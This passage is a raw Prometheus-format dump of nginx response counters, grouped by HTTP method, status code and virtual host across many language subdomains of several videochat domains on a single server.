nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="xh.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="yi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="zh.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="161.97.120.25"} 318 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="af.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="af.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="af.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="af.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="af.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="al.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="al.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="al.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="al.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="al.videochat.world"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="am.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="am.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="am.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="am.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="am.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="am.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ar.videochat.cafe"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ar.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ar.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ar.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ar.videochat.tv.br"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ar.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="az.videochat.cafe"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="az.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="az.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="az.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="az.videochat.world"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ba.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ba.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ba.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ba.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ba.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ba.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="be.videochat.cafe"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="be.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="be.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="be.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="be.videochat.tv.br"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="be.videochat.world"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bg.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bg.videochat.date"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bg.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bg.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bg.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bg.videochat.world"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bn.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bn.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bn.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bn.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bn.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bn.videochat.world"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bs.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bs.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bs.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bs.videochat.show"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bs.videochat.tv.br"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bs.videochat.world"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ca.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ca.videochat.mx"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ca.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ca.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ceb.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ceb.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ceb.videochat.mx"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ceb.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ceb.videochat.tv.br"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ceb.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="chm.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="chm.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="chm.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="chm.videochat.world"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cs.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cs.videochat.date"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cs.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cs.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cs.videochat.tv.br"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cs.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cy.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cy.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cy.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cy.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cy.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cy.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="da.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="da.videochat.date"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="da.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="da.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="da.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="da.videochat.world"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="de.videochat.cafe"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="de.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="de.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="de.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="de.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="de.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ee.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ee.videochat.date"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ee.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ee.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ee.videochat.tv.br"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ee.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="el.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="el.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="el.videochat.mx"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="el.videochat.tv.br"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="el.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="en.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="en.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="en.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eo.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eo.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eo.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eo.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eo.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="es.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="es.videochat.date"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="es.videochat.tv.br"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="es.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="et.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="et.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="et.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="et.videochat.tv.br"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="et.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eu.videochat.cafe"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eu.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eu.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eu.videochat.show"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eu.videochat.tv.br"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eu.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fa.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fa.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fa.videochat.mx"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fa.videochat.tv.br"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fa.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fi.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fi.videochat.date"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fi.videochat.mx"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fi.videochat.show"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fi.videochat.tv.br"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fi.videochat.world"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fr.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fr.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fr.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fr.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fr.videochat.world"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ga.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ga.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ga.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ga.videochat.tv.br"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ga.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gl.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gl.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gl.videochat.mx"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gl.videochat.tv.br"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gl.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gu.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gu.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gu.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gu.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gu.videochat.world"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="he.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="he.videochat.date"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="he.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="he.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="he.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="he.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hi.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hi.videochat.date"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hi.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hi.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hi.videochat.tv.br"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hi.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hr.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hr.videochat.date"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hr.videochat.mx"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hr.videochat.show"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hr.videochat.tv.br"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hr.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ht.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ht.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ht.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ht.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ht.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ht.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hu.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hu.videochat.date"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hu.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hu.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hu.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hu.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="id.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="id.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="id.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="id.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="id.videochat.world"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="is.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="is.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="is.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="is.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="is.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="is.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="it.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="it.videochat.date"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="it.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="it.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="it.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="it.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jp.videochat.cafe"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jp.videochat.date"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jp.videochat.mx"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jp.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jp.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jp.videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jv.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jv.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jv.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jv.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jv.videochat.tv.br"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jv.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ka.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ka.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ka.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ka.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kk.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kk.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kk.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kk.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kk.videochat.world"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="km.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="km.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="km.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="km.videochat.world"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kn.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kn.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kn.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kn.videochat.tv.br"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kn.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ko.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ko.videochat.date"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ko.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ko.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ko.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ko.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ky.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ky.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ky.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ky.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ky.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ky.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lb.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lb.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lb.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lb.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lb.videochat.world"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lo.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lo.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lo.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lo.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lo.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lt.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lt.videochat.date"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lt.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lt.videochat.tv.br"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lt.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lv.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lv.videochat.date"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lv.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lv.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lv.videochat.tv.br"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lv.videochat.world"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mg.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mg.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mg.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mg.videochat.tv.br"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mg.videochat.world"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mi.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mi.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mi.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mi.videochat.tv.br"} 10 